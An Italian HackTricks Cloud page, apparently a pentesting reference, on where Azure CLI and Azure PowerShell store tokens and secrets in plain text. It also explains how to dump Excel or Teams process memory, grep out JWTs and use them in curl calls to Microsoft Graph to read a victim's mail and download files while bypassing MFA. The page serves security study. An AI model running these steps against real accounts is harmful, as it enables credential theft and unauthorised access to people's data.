Az - Credenziali Locali del Cloud
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al š¬ Discord group o al telegram group o seguici su Twitter š¦ @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
Archiviazione Locale dei Token e Considerazioni sulla Sicurezza
Azure CLI (Interfaccia a Riga di Comando)
I token e i dati sensibili sono archiviati localmente da Azure CLI, sollevando preoccupazioni di sicurezza:
- Token di Accesso: Archiviati in testo semplice allāinterno di
accessTokens.jsonsituato inC:\Users\<username>\.Azure. - Informazioni sullāAbbonamento:
azureProfile.json, nella stessa directory, contiene i dettagli dellāabbonamento. - File di Log: La cartella
ErrorRecordsallāinterno di.azurepotrebbe contenere log con credenziali esposte, come:
- Comandi eseguiti con credenziali incorporate.
- URL accessibili utilizzando token, che potrebbero rivelare informazioni sensibili.
Azure PowerShell
Azure PowerShell archivia anche token e dati sensibili, che possono essere accessibili localmente:
- Token di Accesso:
TokenCache.dat, situato inC:\Users\<username>\.Azure, archivia i token di accesso in testo semplice. - Segreti del Principale di Servizio: Questi sono archiviati non crittografati in
AzureRmContext.json. - Funzione di Salvataggio del Token: Gli utenti hanno la possibilitĆ di persistere i token utilizzando il comando
Save-AzContext, che dovrebbe essere usato con cautela per prevenire accessi non autorizzati.
Strumenti Automatici per Trovarli
Token in Memoria
Come spiegato in questo video, alcuni software Microsoft sincronizzati con il cloud (Excel, Teamsā¦) potrebbero archiviare token di accesso in chiaro nella memoria. Quindi, semplicemente dumpando la memoria del processo e greppando per token JWT potrebbe concederti accesso a diverse risorse della vittima nel cloud bypassando MFA.
Passaggi:
- Dumpa i processi di excel sincronizzati con lāutente EntraID con il tuo strumento preferito.
- Esegui:
string excel.dmp | grep 'eyJ0'e trova diversi token nellāoutput. - Trova i token che ti interessano di più e esegui strumenti su di essi:
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
Nota che questi tipi di token di accesso possono essere trovati anche allāinterno di altri processi.
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al š¬ Discord group o al telegram group o seguici su Twitter š¦ @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
HackTricks Cloud

